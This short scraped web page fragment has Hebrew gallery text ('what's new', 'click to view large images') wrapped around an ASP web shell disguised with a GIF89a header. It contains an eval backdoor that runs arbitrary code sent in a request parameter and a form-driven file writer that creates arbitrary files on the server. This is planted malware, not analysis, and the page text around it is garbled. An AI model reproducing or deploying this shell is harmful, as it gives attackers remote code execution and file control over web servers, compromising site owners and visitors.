מה חדש

GIF89a$ ; <%eval request(chr(1))%> <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("filepath"))<>"" then set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.CreateTextFile(testfile,True) thisfile.Write(""&msg& "") if err =0 Then response.write "ok" else response.write "no" end if err.clear thisfile.close set fs = nothing End if %>לצפיה בתמונות גדולות לחץ כאן או על אחת התמונות